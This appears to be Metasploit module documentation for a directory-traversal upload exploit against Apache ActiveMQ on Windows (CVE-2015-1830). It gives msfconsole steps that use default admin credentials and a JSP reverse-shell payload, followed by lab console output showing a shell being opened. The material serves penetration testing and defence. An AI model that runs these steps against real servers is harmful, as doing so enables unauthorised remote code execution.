## Introduction

A directory traversal vulnerability was discovered in the fileserver upload/download functionality for blob messages in Apache ActiveMQ 5.x before 5.11.2 for Windows. The vulnerability, tracked as CVE-2015-1830, allows remote attackers to create JSP files in arbitrary directories via unspecified vectors.

Because vulnerable servers allow for directory traversal, they will accept HTTP PUT requests for `/fileserver/..\\admin\\` and process these as requests for `/admin/`. For the PUT request to succeed, credentials need to be provided.

This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a target via an HTTP PUT requests for `/fileserver/..\\admin\\` using the default credentials `admin:admin` (or any other credentials provided by the user). It then issues an HTTP GET request to `/admin/<payload>.jsp` on the target in order to trigger the payload and obtain a shell. The module has been successfully tested against ActiveMQ 5.11.1 on a Windows 7 machine.

## Verification Steps

1. Start msfconsole.
2. Do: `use exploit/windows/http/apache_activemq_traversal_upload`.
3. Do: `set RHOSTS [IP]`. This option is used to set the IP address of the remote system running Apache ActiveMQ.
4. Do: `set PAYLOAD [payload]`. This option can be used to set the payload to use against the target. The default payload is `java/jsp_shell_reverse_tcp`.
5. Do: `set LHOST [IP]`. This option is used to set the IP address of the local machine the payload should establish a connection with.
6. Do: `exploit`.

## Options

1.  `PASSWORD`. The default setting is `admin`, which is the default password for the ActiveMQ administrator account.
2.  `PATH`. This option is the traversal path. `/fileserver/..\admin\` by default.
3.  `USERNAME`. The default setting is `admin`, which is the default ActiveMQ administrator account.

## Scenarios

```
msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

   Name       Current Setting        Required  Description
   ----       ---------------        --------  -----------
   PASSWORD   admin                  yes       Password to authenticate with
   PATH       /fileserver/..\admin\  yes       Traversal path
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.2            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8161                   yes       The target port (TCP)
   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                      yes       The base path to the web application
   USERNAME   admin                  yes       Username to authenticate with
   VHOST                             no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit

[*] Started reverse TCP handler on 192.168.1.1:4444 
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[*] Payload executed!
[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:49194) at 2020-02-04 10:55:36 +0100

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Desktop\activemq 5.11.1\apache-activemq-5.11.1\bin\win64>
```

## References

1. <https://www.cvedetails.com/cve/CVE-2015-1830/>
2. <https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt>
